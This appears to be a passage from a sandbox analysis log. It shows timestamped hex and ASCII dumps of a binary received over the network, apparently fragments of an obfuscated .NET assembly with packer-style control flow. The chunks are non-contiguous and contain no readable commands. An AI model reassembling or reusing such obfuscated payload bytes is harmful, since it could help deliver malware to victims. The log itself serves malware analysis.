                                                                                                                                                                                                    2022-01-14 03:59:13 UTC38INData Raw: 00 00 0a 2a 00 2e 00 fe 09 00 00 28 be 00 00 0a 2a 2e 00 fe 09 00 00 28 bf 00 00 0a 2a 2a fe 09 00 00 6f c0 00 00 0a 2a 00 2e 00 fe 09 00 00 28 c1 00 00 0a 2a 3e 00 fe 09 00 00 fe 09 01 00 28 25 00 00 0a 2a 5e 00 fe 09 00 00 fe 09 01 00 fe 09 02 00 fe 09 03 00 28 ae 00 00 06 2a 3e 00 fe 09 00 00 fe 09 01 00 28 c2 00 00 0a 2a 16 14 14 fe 01 2a 00 00 0a 14 2a 00 1a 28 a9 00 00 06 2a 00 12 00 00 00 2a 00 00 00 1a 28 a9 00 00 06 2a 00 12 00 00 00 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 1a 28 a9 00 00 06 2a 00 13 30 07 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 00 2a 00 00 00 12 00 00 14 2a 00 00 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 4e 02 28 09 00 00 0a 02 03 73 3c 00 00 0a 7d 73 00 00 04 2a 32 02
                                                                                                                                                                                                    Data Ascii: *.(*.(**o*.(*>(%*^(*>(***(**(****(*0***(*(*(*N(s<}s*2
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC39INData Raw: 25 00 00 b4 23 00 00 5e 00 00 00 c8 29 00 00 bb 1f 00 00 f5 16 00 00 2c 11 00 00 97 1b 00 00 27 01 00 00 3a 1f 00 00 52 19 00 00 99 25 00 00 8f 14 00 00 12 25 00 00 0d 11 00 00 15 06 00 00 b1 13 00 00 28 30 00 00 a5 1d 00 00 1d 00 00 00 f8 1e 00 00 bd 03 00 00 da 1b 00 00 e6 00 00 00 ed 22 00 00 e1 07 00 00 9d 0d 00 00 7c 21 00 00 a8 2b 00 00 8c 1d 00 00 9f 1a 00 00 87 20 00 00 77 24 00 00 f8 18 00 00 6d 03 00 00 9b 0e 00 00 4d 26 00 00 8b 18 00 00 09 10 00 00 76 06 00 00 ad 26 00 00 6f 29 00 00 3d 22 00 00 8f 06 00 00 f5 12 00 00 f4 2a 00 00 b7 28 00 00 31 06 00 00 32 02 00 00 5d 0d 00 00 02 25 00 00 b3 0e 00 00 f7 0c 00 00 df 04 00 00 d5 03 00 00 16 0c 00 00 24 2e 00 00 75 0d 00 00 7a 2a 00 00 c2 0f 00 00 1d 17 00 00 e7 08 00 00 8a 07 00 00 66 26 00 00
                                                                                                                                                                                                    Data Ascii: %#^),':R%%(0"|!+ w$mM&v&o)="*(12]%$.uz*f&
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC40INData Raw: ff 20 86 00 00 00 20 63 00 00 00 59 fe 0e 28 00 20 42 00 00 00 38 e3 f6 ff ff fe 0c 0e 00 20 15 00 00 00 fe 0c 29 00 9c 20 48 01 00 00 28 73 01 00 06 39 c6 f6 ff ff 26 20 59 01 00 00 38 bb f6 ff ff 20 5c 00 00 00 20 46 00 00 00 58 fe 0e 29 00 20 19 00 00 00 28 73 01 00 06 3a 9d f6 ff ff 26 20 19 00 00 00 38 92 f6 ff ff 11 2a 11 03 58 13 2a 20 60 01 00 00 28 73 01 00 06 3a 7c f6 ff ff 26 20 f2 00 00 00 38 71 f6 ff ff fe 0c 0e 00 20 06 00 00 00 20 9e 00 00 00 20 58 00 00 00 58 9c 20 5e 00 00 00 38 52 f6 ff ff fe 0c 0e 00 20 04 00 00 00 20 e4 00 00 00 20 4c 00 00 00 59 9c 20 5d 01 00 00 38 33 f6 ff ff fe 0c 11 00 20 0e 00 00 00 fe 0c 28 00 9c 20 29 01 00 00 38 1b f6 ff ff 20 53 00 00 00 20 09 00 00 00 58 fe 0e 29 00 20 ae 00 00 00 38 02 f6 ff ff fe 0c 0e 00
                                                                                                                                                                                                    Data Ascii: cY( B8 ) H(s9& Y8 \ FX) (s:& 8*X* `(s:|& 8q XX ^8R LY ]83 ( )8 S X) 8
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC42INData Raw: 00 00 38 9d f1 ff ff 11 0b 11 1d 5d 13 0d 20 15 00 00 00 fe 0e 20 00 38 84 f1 ff ff fe 0c 0e 00 20 18 00 00 00 fe 0c 29 00 9c 20 9b 00 00 00 38 70 f1 ff ff fe 0c 0e 00 20 11 00 00 00 fe 0c 29 00 9c 20 50 00 00 00 28 74 01 00 06 39 53 f1 ff ff 26 20 29 00 00 00 38 48 f1 ff ff 20 7a 00 00 00 20 1c 00 00 00 58 fe 0e 29 00 20 02 00 00 00 28 74 01 00 06 3a 2a f1 ff ff 26 20 0b 00 00 00 38 1f f1 ff ff fe 0c 0e 00 20 00 00 00 00 20 20 00 00 00 20 62 00 00 00 58 9c 20 1f 00 00 00 28 74 01 00 06 39 fb f0 ff ff 26 20 1c 00 00 00 38 f0 f0 ff ff fe 0c 0e 00 20 10 00 00 00 fe 0c 29 00 9c 20 03 01 00 00 38 d8 f0 ff ff 20 cc 00 00 00 20 44 00 00 00 59 fe 0e 29 00 20 1a 01 00 00 38 bf f0 ff ff fe 0c 11 00 20 03 00 00 00 fe 0c 28 00 9c 20 9d 00 00 00 28 73 01 00 06 3a a2
                                                                                                                                                                                                    Data Ascii: 8] 8 ) 8p ) P(t9S& )8H z X) (t:*& 8 bX (t9& 8 ) 8 DY) 8 ( (s:
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC43INData Raw: ff fe 0c 0e 00 20 0a 00 00 00 fe 0c 29 00 9c 20 3f 00 00 00 28 74 01 00 06 39 2d ec ff ff 26 20 30 00 00 00 38 22 ec ff ff 20 b3 00 00 00 20 3b 00 00 00 59 fe 0e 29 00 20 f6 00 00 00 28 73 01 00 06 3a 04 ec ff ff 26 20 16 00 00 00 38 f9 eb ff ff fe 0c 11 00 20 02 00 00 00 fe 0c 28 00 9c 20 54 01 00 00 38 e1 eb ff ff fe 0c 0e 00 20 19 00 00 00 20 fc 00 00 00 20 54 00 00 00 59 9c 20 25 01 00 00 fe 0e 20 00 38 ba eb ff ff fe 0c 0e 00 20 03 00 00 00 20 da 00 00 00 20 48 00 00 00 59 9c 20 03 01 00 00 28 73 01 00 06 39 9a eb ff ff 26 20 2a 01 00 00 38 8f eb ff ff 11 06 8e 69 1a 5d 13 05 20 77 01 00 00 38 7d eb ff ff fe 0c 11 00 20 0c 00 00 00 fe 0c 28 00 9c 20 e7 00 00 00 38 65 eb ff ff 20 f5 00 00 00 20 51 00 00 00 59 fe 0e 29 00 20 7e 01 00 00 28 73 01 00 06
                                                                                                                                                                                                    Data Ascii: ) ?(t9-& 08" ;Y) (s:& 8 ( T8 TY % 8 HY (s9& *8i] w8} ( 8e QY) ~(s
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC44INData Raw: ee e6 ff ff 26 20 06 00 00 00 38 e3 e6 ff ff 20 dd 00 00 00 20 49 00 00 00 59 fe 0e 29 00 20 5f 00 00 00 38 ca e6 ff ff fe 0c 0e 00 20 13 00 00 00 fe 0c 29 00 9c 20 65 01 00 00 38 b2 e6 ff ff fe 0c 0e 00 20 03 00 00 00 20 a8 00 00 00 20 38 00 00 00 59 9c 20 2b 01 00 00 28 73 01 00 06 3a 8e e6 ff ff 26 20 14 00 00 00 38 83 e6 ff ff 16 13 08 20 17 01 00 00 28 73 01 00 06 3a 71 e6 ff ff 26 20 82 00 00 00 38 66 e6 ff ff 20 65 00 00 00 20 3e 00 00 00 58 fe 0e 29 00 20 e5 00 00 00 28 73 01 00 06 39 48 e6 ff ff 26 20 ee 00 00 00 38 3d e6 ff ff fe 0c 0e 00 20 1f 00 00 00 20 ce 00 00 00 20 44 00 00 00 59 9c 20 a1 00 00 00 28 74 01 00 06 39 19 e6 ff ff 26 20 29 00 00 00 38 0e e6 ff ff 11 0b 17 58 13 0b 20 ce 00 00 00 38 fe e5 ff ff 20 b0 00 00 00 20 38 00 00 00 59
                                                                                                                                                                                                    Data Ascii: & 8 IY) _8 ) e8 8Y +(s:& 8 (s:q& 8f e >X) (s9H& 8= DY (t9& )8X 8 8Y
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC46INData Raw: 95 e1 ff ff 20 d5 00 00 00 20 47 00 00 00 59 fe 0e 29 00 20 0a 00 00 00 28 74 01 00 06 3a 77 e1 ff ff 26 20 0c 00 00 00 38 6c e1 ff ff fe 0c 11 00 20 05 00 00 00 20 96 00 00 00 20 32 00 00 00 59 9c 20 79 01 00 00 38 4d e1 ff ff 20 28 00 00 00 20 04 00 00 00 59 fe 0e 28 00 20 aa 00 00 00 38 34 e1 ff ff fe 0c 11 00 20 0c 00 00 00 fe 0c 28 00 9c 20 44 00 00 00 38 1c e1 ff ff 16 13 03 20 45 00 00 00 38 0f e1 ff ff 20 81 00 00 00 20 2b 00 00 00 59 fe 0e 28 00 20 82 00 00 00 28 73 01 00 06 3a f1 e0 ff ff 26 20 0f 00 00 00 38 e6 e0 ff ff fe 0c 11 00 20 0c 00 00 00 20 5b 00 00 00 20 14 00 00 00 58 9c 20 84 00 00 00 38 c7 e0 ff ff fe 0c 0e 00 20 1f 00 00 00 fe 0c 29 00 9c 20 73 01 00 00 38 af e0 ff ff 20 66 00 00 00 20 2d 00 00 00 59 fe 0e 29 00 20 8a 00 00 00 28
                                                                                                                                                                                                    Data Ascii: GY) (t:w& 8l 2Y y8M ( Y( 84 ( D8 E8 +Y( (s:& 8 [ X 8 ) s8 f -Y) (
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC47INData Raw: 00 59 9c 20 33 01 00 00 38 33 dc ff ff 20 19 00 00 00 20 5b 00 00 00 58 fe 0e 29 00 20 5e 01 00 00 38 1a dc ff ff 11 1c 11 1f 11 07 20 ff 00 00 00 5f d2 9c 20 4a 01 00 00 38 02 dc ff ff 11 21 73 21 00 00 0a 16 73 ca 00 00 0a 13 15 20 2f 00 00 00 38 e9 db ff ff fe 0c 0e 00 20 08 00 00 00 fe 0c 29 00 9c 20 bc 00 00 00 38 d1 db ff ff fe 0c 0e 00 20 0b 00 00 00 fe 0c 29 00 9c 20 9f 00 00 00 28 74 01 00 06 39 b4 db ff ff 26 20 0c 00 00 00 38 a9 db ff ff 20 01 00 00 00 13 0a 20 4d 00 00 00 fe 0e 20 00 38 90 db ff ff fe 0c 0e 00 20 1a 00 00 00 20 02 00 00 00 20 66 00 00 00 58 9c 20 3c 00 00 00 38 75 db ff ff 20 93 00 00 00 20 31 00 00 00 59 fe 0e 29 00 20 57 00 00 00 28 73 01 00 06 3a 57 db ff ff 26 20 32 00 00 00 38 4c db ff ff fe 0c 0e 00 20 0d 00 00 00 fe 0c
                                                                                                                                                                                                    Data Ascii: Y 383 [X) ^8 _ J8!s!s /8 ) 8 ) (t9& 8 M 8 fX <8u 1Y) W(s:W& 28L
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC48INData Raw: 28 73 01 00 06 3a dd d6 ff ff 26 20 24 00 00 00 38 d2 d6 ff ff 20 7b 00 00 00 20 7b 00 00 00 59 fe 0e 29 00 20 6a 00 00 00 fe 0e 20 00 38 b1 d6 ff ff fe 0c 11 00 20 0e 00 00 00 20 d7 00 00 00 20 47 00 00 00 59 9c 20 86 00 00 00 38 96 d6 ff ff fe 0c 0e 00 20 18 00 00 00 fe 0c 29 00 9c 20 3b 01 00 00 28 74 01 00 06 39 79 d6 ff ff 26 20 4e 00 00 00 38 6e d6 ff ff fe 0c 0e 00 20 15 00 00 00 20 be 00 00 00 20 3f 00 00 00 59 9c 20 82 00 00 00 28 73 01 00 06 39 4a d6 ff ff 26 20 ac 00 00 00 38 3f d6 ff ff 20 80 00 00 00 20 73 00 00 00 58 fe 0e 29 00 20 7d 00 00 00 38 26 d6 ff ff 11 25 28 6f 01 00 06 28 6c 01 00 06 80 77 00 00 04 20 e9 00 00 00 38 0b d6 ff ff 38 bf de ff ff 20 95 00 00 00 38 fc d5 ff ff fe 0c 0e 00 20 1b 00 00 00 20 8d 00 00 00 20 2f 00 00 00 59
                                                                                                                                                                                                    Data Ascii: (s:& $8 { {Y) j 8 GY 8 ) ;(t9y& N8n ?Y (s9J& 8? sX) }8&%(o(lw 88 8 /Y
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC50INData Raw: 0e 01 00 00 38 85 d1 ff ff 17 80 78 00 00 04 20 a7 00 00 00 38 75 d1 ff ff fe 0c 0e 00 20 01 00 00 00 fe 0c 29 00 9c 20 73 00 00 00 28 73 01 00 06 3a 58 d1 ff ff 26 20 2e 00 00 00 38 4d d1 ff ff fe 0c 0e 00 20 03 00 00 00 fe 0c 29 00 9c 20 b3 00 00 00 fe 0e 20 00 38 2d d1 ff ff 20 49 00 00 00 20 0a 00 00 00 58 fe 0e 29 00 20 6e 00 00 00 28 74 01 00 06 39 13 d1 ff ff 26 20 0b 00 00 00 38 08 d1 ff ff 11 2a 11 03 58 13 2a 20 19 01 00 00 28 73 01 00 06 3a f2 d0 ff ff 26 20 88 00 00 00 38 e7 d0 ff ff d0 29 00 00 02 28 66 01 00 06 6f 24 00 00 0a 72 13 12 00 70 28 67 01 00 06 73 39 01 00 06 13 13 20 1c 01 00 00 28 73 01 00 06 3a b8 d0 ff ff 26 20 36 00 00 00 38 ad d0 ff ff fe 0c 11 00 20 04 00 00 00 fe 0c 28 00 9c 20 71 01 00 00 fe 0e 20 00 38 8d d0 ff ff 20 b1
                                                                                                                                                                                                    Data Ascii: 8x 8u ) s(s:X& .8M ) 8- I X) n(t9& 8*X* (s:& 8)(fo$rp(gs9 (s:& 68 ( q 8
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC51INData Raw: 20 d4 00 00 00 20 46 00 00 00 59 9c 20 33 00 00 00 fe 0e 20 00 38 17 cc ff ff fe 0c 11 00 20 0e 00 00 00 fe 0c 28 00 9c 20 6b 01 00 00 28 74 01 00 06 39 fe cb ff ff 26 20 3d 00 00 00 38 f3 cb ff ff fe 0c 11 00 20 00 00 00 00 20 9f 00 00 00 20 35 00 00 00 59 9c 20 1d 00 00 00 28 73 01 00 06 39 cf cb ff ff 26 20 a9 00 00 00 38 c4 cb ff ff 20 e7 00 00 00 20 4d 00 00 00 59 fe 0e 28 00 20 5d 00 00 00 28 73 01 00 06 3a a6 cb ff ff 26 20 0a 00 00 00 38 9b cb ff ff 11 05 16 3e c8 d5 ff ff 20 87 00 00 00 38 89 cb ff ff 20 9d 00 00 00 20 34 00 00 00 59 fe 0e 28 00 20 72 00 00 00 28 73 01 00 06 39 6b cb ff ff 26 20 fc 00 00 00 38 60 cb ff ff 20 5e 00 00 00 20 2f 00 00 00 58 fe 0e 29 00 20 20 00 00 00 38 47 cb ff ff fe 0c 0e 00 20 08 00 00 00 20 9c 00 00 00 20 34 00
                                                                                                                                                                                                    Data Ascii: FY 3 8 ( k(t9& =8 5Y (s9& 8 MY( ](s:& 8> 8 4Y( r(s9k& 8` ^ /X) 8G 4
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC52INData Raw: 00 0a 6f d3 00 00 0a 28 5e 01 00 06 2a 00 5e 7e 79 00 00 04 3a 0c 00 00 00 17 80 79 00 00 04 73 63 01 00 06 26 2a 7a 16 8d 08 00 00 01 80 76 00 00 04 14 80 77 00 00 04 16 80 78 00 00 04 16 80 79 00 00 04 2a 00 2e 00 fe 09 00 00 28 23 00 00 0a 2a 3a fe 09 00 00 fe 09 01 00 6f 3b 00 00 0a 2a 00 2a fe 09 00 00 6f 3a 01 00 06 2a 00 3a fe 09 00 00 fe 09 01 00 6f 37 00 00 0a 2a 00 2a fe 09 00 00 6f 3d 00 00 0a 2a 00 3a fe 09 00 00 fe 09 01 00 6f 3b 01 00 06 2a 00 2e 00 fe 09 00 00 28 7d 01 00 06 2a 3a fe 09 00 00 fe 09 01 00 6f d4 00 00 0a 2a 00 2a fe 09 00 00 6f 85 00 00 0a 2a 00 2a fe 09 00 00 6f 86 00 00 0a 2a 00 2a fe 09 00 00 6f d5 00 00 0a 2a 00 3e 00 fe 09 00 00 fe 09 01 00 28 7e 01 00 06 2a 2a fe 09 00 00 6f cd 00 00 0a 2a 00 16 14 14 fe 01 2a 00 00 0a
                                                                                                                                                                                                    Data Ascii: o(^*^~y:ysc&*zvwxy*.(#*:o;**o:*:o7**o=*:o;*.(}*:o**o**o**o*>(~**o**
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC54INData Raw: 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 04 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 04 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 04 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 14 2a 00 00 00 12 00 00 17 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 17 2a 13 30 02 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 17 2a 13 30 03 00 04 00
                                                                                                                                                                                                    Data Ascii: *0*0*0*0*0*0**0*0*0*0*0***0*0*0*0
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC58INData Raw: 12 00 00 17 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 1a 28 a9 00 00 06 2a 00 12 00 00 00 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 00 2a 00 00 00 22 00 14 a5 13 00 00 01 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 17 2a 00 00 00 03 30 03 00 04 00 00 00 00 00 00 00 00 00 17 2a 03 30 03 00 04 00 00 00 00 00 00 00 00 00 17 2a 12 00 00 17 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 1a 28 a9 00 00 06 2a 00 12 00 00 00 2a 00 00 00 22 00 14 a5 13 00 00 01 2a 00 00 00 03 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00
                                                                                                                                                                                                    Data Ascii: *****(**0**"*****0*0****(**"*0*****
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC62INData Raw: 00 00 00 3a 0e 03 0e 00 0e 01 0e 02 6f 33 05 00 06 2a 00 42 28 a9 00 00 06 d0 93 00 00 02 28 a0 00 00 06 2a 00 00 00 2a 0e 01 0e 00 6f 37 05 00 06 2a 00 42 28 a9 00 00 06 d0 94 00 00 02 28 a0 00 00 06 2a 00 00 00 2a 0e 01 0e 00 6f 3b 05 00 06 2a 00 42 28 a9 00 00 06 d0 95 00 00 02 28 a0 00 00 06 2a 00 00 00 32 0e 02 0e 00 0e 01 6f 3f 05 00 06 2a 00 00 00 42 28 a9 00 00 06 d0 96 00 00 02 28 a0 00 00 06 2a 00 00 00 2a 0e 01 0e 00 6f 43 05 00 06 2a 00 42 28 a9 00 00 06 d0 97 00 00 02 28 a0 00 00 06 2a 00 00 00 2a 0e 01 0e 00 6f 47 05 00 06 2a 00 42 28 a9 00 00 06 d0 98 00 00 02 28 a0 00 00 06 2a 00 00 00 32 0e 02 0e 00 0e 01 6f 4b 05 00 06 2a 00 00 00 42 28 a9 00 00 06 d0 99 00 00 02 28 a0 00 00 06 2a 00 00 00 2a 0e 01 0e 00 6f 4f 05 00 06 2a 00 42 28 a9 00
                                                                                                                                                                                                    Data Ascii: :o3*B((**o7*B((**o;*B((*2o?*B((**oC*B((**oG*B((*2oK*B((**oO*B(
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC66INData Raw: 00 00 2d 00 1b 00 63 00 02 01 00 00 e8 04 00 00 2d 00 1b 00 68 00 02 01 00 00 3c 05 00 00 2d 00 1b 00 6d 00 02 01 00 00 a7 05 00 00 2d 00 1b 00 72 00 02 01 00 00 ba 05 00 00 2d 00 1b 00 77 00 11 01 00 00 f0 05 00 00 31 00 1b 00 7c 00 11 01 00 00 28 06 00 00 31 00 1e 00 7c 00 11 01 00 00 72 06 00 00 31 00 20 00 7c 00 11 01 00 00 ac 06 00 00 31 00 21 00 7c 00 11 01 00 00 dc 06 00 00 31 00 24 00 7c 00 11 01 00 00 0b 07 00 00 31 00 29 00 7c 00 09 01 00 00 48 07 00 00 31 00 2c 00 7c 00 09 01 01 00 7d 07 00 00 31 00 30 00 7c 00 01 01 00 00 8f 07 00 00 29 00 42 00 7c 00 00 01 00 00 d6 07 00 00 29 00 44 00 82 00 13 01 00 00 f5 07 00 00 31 00 45 00 83 00 00 00 00 00 16 08 00 00 29 00 45 00 83 00 00 00 00 00 45 08 58 08 29 00 45 00 84 00 05 01 00 00 6b 08 00 00 2d
                                                                                                                                                                                                    Data Ascii: -c-h<-m-r-w1|(1|r1 |1!|1$|1)|H1,|}10|)B|)D1E)EEX)Ek-
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC70INData Raw: 15 01 00 c1 57 e3 15 11 00 cc 57 51 12 06 06 69 3c 75 05 36 00 f6 3f 70 0e 16 00 ec 3f 66 0e 11 00 5c 58 ec 01 33 01 98 58 04 16 33 01 d9 58 09 16 33 01 1a 59 0e 16 33 01 5b 59 e9 01 33 01 9c 59 13 16 33 01 dd 59 18 16 33 01 1e 5a 09 16 33 01 5f 5a 1d 16 33 01 a0 5a 22 16 13 00 e1 5a 75 05 13 00 04 5b 75 05 13 00 27 5b 75 05 13 00 4a 5b 75 05 13 00 6d 5b 75 05 13 00 90 5b 75 05 13 00 b3 5b 75 05 13 00 d6 5b 75 05 13 00 f9 5b 75 05 13 00 1c 5c 75 05 13 00 3f 5c 75 05 13 00 62 5c 75 05 13 00 85 5c 75 05 13 00 a8 5c 75 05 13 00 cb 5c 75 05 13 00 ee 5c 75 05 13 00 11 5d 75 05 13 00 34 5d 75 05 13 00 57 5d 75 05 13 00 7a 5d 75 05 13 00 9d 5d 75 05 13 00 c0 5d 75 05 13 00 e3 5d 75 05 13 00 06 5e 75 05 13 00 29 5e 75 05 13 00 4c 5e 75 05 13 00 6f 5e 75 05 13 00
                                                                                                                                                                                                    Data Ascii: WWQi<u6?p?f\X3X3X3Y3[Y3Y3Y3Z3_Z3Z"Zu[u'[uJ[um[u[u[u[u[u\u?\ub\u\u\u\u\u]u4]uW]uz]u]u]u]u^u)^uL^uo^u
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC74INData Raw: 00 00 08 00 93 00 2a 31 51 0a 1b 01 b8 a9 00 00 08 00 93 00 49 31 63 08 1b 01 c8 a9 00 00 08 00 93 00 5d 31 69 08 1b 01 d8 a9 00 00 08 00 93 00 71 31 82 08 1b 01 ec a9 00 00 08 00 93 00 85 31 89 08 1b 01 00 aa 00 00 08 00 93 00 99 31 57 0a 1b 01 14 aa 00 00 08 00 93 00 b8 31 74 08 1b 01 20 aa 00 00 08 00 93 00 cc 31 5e 0a 1b 01 38 aa 00 00 08 00 93 00 e0 31 37 01 1b 01 40 aa 00 00 08 00 93 00 f4 31 66 0a 1b 01 48 aa 00 00 08 00 93 00 1a 32 75 09 1b 01 54 aa 00 00 08 00 93 00 3d 32 76 0a 1b 01 60 aa 00 00 08 00 93 00 61 32 7b 0a 1b 01 74 aa 00 00 08 00 93 00 75 32 d6 09 1d 01 84 aa 00 00 08 00 93 00 97 32 37 01 1d 01 8c aa 00 00 08 00 93 00 ab 32 5f 08 1d 01 94 aa 00 00 08 00 93 00 bf 32 82 0a 1d 01 a4 aa 00 00 08 00 93 00 d3 32 92 0a 1d 01 b4 aa 00 00 08
                                                                                                                                                                                                    Data Ascii: *1QI1c]1iq111W1t 1^817@1fH2uT=2v`a2{tu2272_22
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC78INData Raw: 00 08 00 93 00 4e 45 c8 0a eb 01 00 f0 00 00 08 00 93 00 62 45 a8 0a eb 01 08 f0 00 00 08 00 93 00 76 45 a8 0a eb 01 10 f0 00 00 00 00 91 18 0f 17 37 01 eb 01 18 f0 00 00 08 00 c3 02 f3 40 fe 0e eb 01 20 f0 00 00 08 00 c3 02 fe 40 fe 0e ec 01 28 f0 00 00 08 00 86 18 54 00 09 07 ed 01 30 f0 00 00 08 00 86 18 54 00 ac 0f ee 01 40 f0 00 00 08 00 c6 00 09 41 11 0f ef 01 48 f0 00 00 08 00 86 18 54 00 b3 0f ef 01 50 f0 00 00 08 00 86 18 54 00 bb 0f f1 01 58 f0 00 00 08 00 86 18 54 00 c0 0f f2 01 60 f0 00 00 08 00 c6 00 14 41 7e 01 f4 01 68 f0 00 00 08 00 c6 00 1f 41 7e 01 f4 01 70 f0 00 00 08 00 c6 00 2a 41 32 0f f4 01 80 f0 00 00 08 00 c3 02 35 41 41 0f f5 01 90 f0 00 00 08 00 83 00 0c 46 41 0f f6 01 a0 f0 00 00 08 00 c6 00 4b 41 56 0f f7 01 a8 f0 00 00 08 00
                                                                                                                                                                                                    Data Ascii: NEbEvE7@ @(T0T@AHTPTXT`A~hA~p*A25AAFAKAV
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC82INData Raw: 08 00 c3 02 ee 48 7e 01 65 02 14 fa 00 00 08 00 84 18 54 00 d7 00 65 02 1c fa 00 00 08 00 93 00 f9 48 45 01 65 02 24 fa 00 00 08 00 93 00 0d 49 0a 10 65 02 2c fa 00 00 00 00 91 18 0f 17 37 01 65 02 34 fa 00 00 08 00 c3 02 f3 40 fe 0e 65 02 3c fa 00 00 08 00 c3 02 fe 40 fe 0e 66 02 44 fa 00 00 08 00 86 18 54 00 18 10 67 02 4c fa 00 00 08 00 86 18 54 00 1d 10 68 02 5c fa 00 00 08 00 c6 00 09 41 11 0f 69 02 64 fa 00 00 08 00 86 18 54 00 24 10 69 02 6c fa 00 00 08 00 86 18 54 00 2c 10 6b 02 74 fa 00 00 08 00 86 18 54 00 31 10 6c 02 7c fa 00 00 08 00 c6 00 14 41 7e 01 6e 02 84 fa 00 00 08 00 c6 00 1f 41 7e 01 6e 02 8c fa 00 00 08 00 c6 00 f1 2e 08 02 6e 02 94 fa 00 00 08 00 c6 00 2a 41 32 0f 6e 02 a4 fa 00 00 08 00 c3 02 35 41 41 0f 6f 02 b4 fa 00 00 08 00 c6
                                                                                                                                                                                                    Data Ascii: H~eTeHEe$Ie,7e4@e<@fDTgLTh\AidT$ilT,ktT1l|A~nA~n.n*A2n5AAo
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC86INData Raw: 00 93 00 cd 55 c3 0a 13 03 2c 07 01 00 08 00 91 18 0f 17 37 01 13 03 4c 07 01 00 08 00 86 18 54 00 d7 00 13 03 54 07 01 00 08 00 83 00 ff 55 79 0e 13 03 5c 07 01 00 08 00 93 00 0e 56 45 01 15 03 64 07 01 00 08 00 93 00 22 56 6f 15 15 03 6c 07 01 00 08 00 93 00 36 56 37 01 15 03 74 07 01 00 08 00 86 18 54 00 d7 00 15 03 7c 07 01 00 08 00 83 00 69 56 7e 01 15 03 84 07 01 00 08 00 83 00 74 56 7e 01 15 03 8c 07 01 00 08 00 83 00 7f 56 7e 01 15 03 94 07 01 00 08 00 83 00 8a 56 7e 01 15 03 9c 07 01 00 08 00 83 00 95 56 7e 01 15 03 a4 07 01 00 08 00 83 00 a0 56 7e 01 15 03 ac 07 01 00 08 00 c3 03 c9 4a 7e 01 15 03 b4 07 01 00 08 00 c3 03 3e 47 7e 01 15 03 00 00 00 00 00 00 c3 07 fe 40 fe 0e 15 03 bc 07 01 00 08 00 c3 03 ee 48 7e 01 16 03 c4 07 01 00 08 00 83 18
                                                                                                                                                                                                    Data Ascii: U,7LTTUy\VEd"Vol6V7tT|iV~tV~V~V~V~V~J~>G~@H~
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC90INData Raw: 06 18 54 00 65 01 31 03 ac 11 01 00 08 00 10 18 0f 17 37 01 31 03 00 00 00 00 03 00 46 00 24 18 22 1b 31 03 c0 11 01 00 08 00 16 00 f5 68 2a 1b 31 03 00 00 00 00 03 00 06 18 54 00 65 01 31 03 d0 11 01 00 08 00 10 18 0f 17 37 01 31 03 00 00 00 00 03 00 46 00 24 18 3a 1b 31 03 e4 11 01 00 08 00 16 00 f5 68 42 1b 31 03 00 00 00 00 03 00 06 18 54 00 65 01 31 03 f4 11 01 00 08 00 10 18 0f 17 37 01 31 03 00 00 00 00 03 00 46 00 24 18 52 1b 31 03 08 12 01 00 08 00 16 00 f5 68 5a 1b 31 03 00 00 00 00 03 00 06 18 54 00 65 01 31 03 18 12 01 00 08 00 10 18 0f 17 37 01 31 03 00 00 00 00 03 00 46 00 24 18 6a 1b 31 03 2c 12 01 00 08 00 16 00 f5 68 72 1b 31 03 00 00 00 00 03 00 06 18 54 00 65 01 31 03 3c 12 01 00 08 00 10 18 0f 17 37 01 31 03 00 00 00 00 03 00 46 00 24
                                                                                                                                                                                                    Data Ascii: Te171F$"1h*1Te171F$:1hB1Te171F$R1hZ1Te171F$j1,hr1Te1<71F$
